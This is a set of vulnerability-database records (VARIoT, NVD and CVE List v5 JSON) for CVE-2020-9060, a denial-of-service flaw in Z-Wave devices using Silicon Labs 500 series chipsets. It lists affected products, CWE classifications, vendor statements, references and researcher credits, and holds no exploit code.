            "id": "CVE-2020-9060"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages. Various Silicon Labs Z-Wave chipsets do not support encryption, can be downgraded to not use weaker encryption, and are vulnerable to denial of service. Some of these vulnerabilities are inherent in Z-Wave protocol specifications.CVE-2020-10137 Unknown\nCVE-2020-9057 Affected\nVendor Statement:\nThis is a known weakness with unencrypted traffic. S0 and S2 security can encrypt application data. \nCVE-2020-9058 Affected\nVendor Statement:\nThis is a known weakness with unencrypted traffic.  S0 and S2 can encrypt application data. \nCVE-2020-9059 Affected\nVendor Statement:\nThis is a known weakness with S0 security. \nCVE-2020-9060 Affected\nVendor Statement:\nThis is a known weakness with S2 security. \nCVE-2020-9061 Affected\nVendor Statement:\nThis is a known weakness with S0 and S2 security.CVE-2020-10137 Unknown\nCVE-2020-9057 Affected\nVendor Statement:\nThis is a known weakness with unencrypted traffic. S0 and S2 security can encrypt application data. \nCVE-2020-9058 Affected\nVendor Statement:\nThis is a known weakness with unencrypted traffic.  S0 and S2 can encrypt application data. \nCVE-2020-9059 Affected\nVendor Statement:\nThis is a known weakness with S0 security. \nCVE-2020-9060 Affected\nVendor Statement:\nThis is a known weakness with S2 security. \nCVE-2020-9061 Affected\nVendor Statement:\nThis is a known weakness with S0 and S2 security. Products from multiple vendors contain resource exhaustion vulnerabilities.Service operation interruption (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          },
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          }
        ],
        "trust": 2.43
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-9060",
            "trust": 4.2
          },
          {
            "db": "CERT/CC",
            "id": "VU#142629",
            "trust": 3.3
          },
          {
            "db": "JVN",
            "id": "JVNVU94598199",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-187185",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9060",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "id": "VAR-202201-0274",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-08-14T14:18:11.282000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page iotech Aeotec",
            "trust": 0.8,
            "url": "https://www.fibaro.com/us/"
          },
          {
            "title": "Silicon Labs Z-Wave Chipsets Remediation of resource management error vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=178624"
          },
          {
            "title": "VFuzz-public",
            "trust": 0.1,
            "url": "https://github.com/CNK2100/VFuzz-public "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-9060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-400",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-346",
            "trust": 1.0
          },
          {
            "problemtype": "Resource exhaustion (CWE-400) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://github.com/cnk2100/vfuzz-public"
          },
          {
            "trust": 2.5,
            "url": "https://kb.cert.org/vuls/id/142629"
          },
          {
            "trust": 2.5,
            "url": "https://ieeexplore.ieee.org/document/9663293"
          },
          {
            "trust": 1.7,
            "url": "https://www.kb.cert.org/vuls/id/142629"
          },
          {
            "trust": 1.7,
            "url": "https://doi.org/10.1109/access.2021.3138768"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9060"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu94598199/index.html"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-01-07T00:00:00",
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "date": "2022-01-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "date": "2023-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "date": "2022-01-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "date": "2022-01-10T14:10:16.380000",
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-01-09T00:00:00",
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "date": "2022-09-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "date": "2023-02-10T08:31:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "date": "2022-01-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "date": "2022-09-20T17:16:46.377000",
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Silicon Labs Z-Wave chipsets contain multiple vulnerabilities",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "resource management error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2020-9060 (GCVE-0-2020-9060)

    Vulnerability from nvd – Published: 2022-01-07 04:30 – Updated: 2024-09-16 16:33
    Summary
    Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages.
    Severity
    No CVSS data available.
    CWE
    • CWE-346 - Origin Validation Error
    • CWE-400 - Uncontrolled Resource Consumption
    Assigner
    References
    URL                                              Tags
    https://kb.cert.org/vuls/id/142629               third-party-advisory, x_refsource_CERT-VN
    https://ieeexplore.ieee.org/document/9663293     x_refsource_MISC
    https://github.com/CNK2100/VFuzz-public          x_refsource_MISC
    https://doi.org/10.1109/ACCESS.2021.3138768      x_refsource_MISC
    https://www.kb.cert.org/vuls/id/142629           third-party-advisory, x_refsource_CERT-VN
    Date Public
    2021-12-27 00:00
    Credits
    Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T10:19:19.795Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "third-party-advisory",
                  "x_refsource_CERT-VN",
                  "x_transferred"
                ],
                "url": "https://kb.cert.org/vuls/id/142629"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://ieeexplore.ieee.org/document/9663293"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/CNK2100/VFuzz-public"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
              },
              {
                "name": "VU#142629",
                "tags": [
                  "third-party-advisory",
                  "x_refsource_CERT-VN",
                  "x_transferred"
                ],
                "url": "https://www.kb.cert.org/vuls/id/142629"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "ZEN25",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.03"
                }
              ]
            },
            {
              "product": "ZEN20",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.03"
                }
              ]
            },
            {
              "product": "ZST10",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.04"
                }
              ]
            },
            {
              "product": "FGWPB-111",
              "vendor": "Fibaro",
              "versions": [
                {
                  "status": "affected",
                  "version": "4.3"
                }
              ]
            },
            {
              "product": "500 series",
              "vendor": "Silicon Labs",
              "versions": [
                {
                  "status": "affected",
                  "version": "all"
                }
              ]
            },
            {
              "product": "ZW090-A",
              "vendor": "Aeon Labs",
              "versions": [
                {
                  "status": "affected",
                  "version": "3.95"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "value": "Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee"
            }
          ],
          "datePublic": "2021-12-27T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-346",
                  "description": "CWE-346 Origin Validation Error",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-400",
                  "description": "CWE-400 Uncontrolled Resource Consumption",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-01-07T23:06:11.000Z",
            "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
            "shortName": "certcc"
          },
          "references": [
            {
              "tags": [
                "third-party-advisory",
                "x_refsource_CERT-VN"
              ],
              "url": "https://kb.cert.org/vuls/id/142629"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://ieeexplore.ieee.org/document/9663293"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/CNK2100/VFuzz-public"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
            },
            {
              "name": "VU#142629",
              "tags": [
                "third-party-advisory",
                "x_refsource_CERT-VN"
              ],
              "url": "https://www.kb.cert.org/vuls/id/142629"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "x_generator": {
            "engine": "Vulnogram 0.0.9"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cert@cert.org",
              "DATE_PUBLIC": "2021-12-27T05:00:00.000Z",
              "ID": "CVE-2020-9060",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZEN25",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "5.03"
                              }
                            ]
                          }
                        },
                        {
                          "product_name": "ZEN20",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "5.03"
                              }
                            ]
                          }
                        },
                        {
                          "product_name": "ZST10",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "6.04"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "ZooZ"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "FGWPB-111",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "4.3"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Fibaro"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "500 series",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "all"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Silicon Labs"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZW090-A",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "3.95"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Aeon Labs"
                  }
                ]
              }
            },
            "credit": [
              {
                "lang": "eng",
                "value": "Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee"
              }
            ],
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages."
                }
              ]
            },
            "generator": {
              "engine": "Vulnogram 0.0.9"
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "CWE-346 Origin Validation Error"
                    }
                  ]
                },
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "CWE-400 Uncontrolled Resource Consumption"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://kb.cert.org/vuls/id/142629",
                  "refsource": "CERT-VN",
                  "url": "https://kb.cert.org/vuls/id/142629"
                },
                {
                  "name": "https://ieeexplore.ieee.org/document/9663293",
                  "refsource": "MISC",
                  "url": "https://ieeexplore.ieee.org/document/9663293"
                },
                {
                  "name": "https://github.com/CNK2100/VFuzz-public",
                  "refsource": "MISC",
                  "url": "https://github.com/CNK2100/VFuzz-public"
                },
                {
                  "name": "https://doi.org/10.1109/ACCESS.2021.3138768",
                  "refsource": "MISC",
                  "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
                },
                {
                  "name": "VU#142629",
                  "refsource": "CERT-VN",
                  "url": "https://www.kb.cert.org/vuls/id/142629"
                }
              ]
            },
            "source": {
              "discovery": "EXTERNAL"
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "assignerShortName": "certcc",
        "cveId": "CVE-2020-9060",
        "datePublished": "2022-01-07T04:30:28.026Z",
        "dateReserved": "2020-02-18T00:00:00.000Z",
        "dateUpdated": "2024-09-16T16:33:05.408Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2020-9060 (GCVE-0-2020-9060)

    Vulnerability from cvelistv5 – Published: 2022-01-07 04:30 – Updated: 2024-09-16 16:33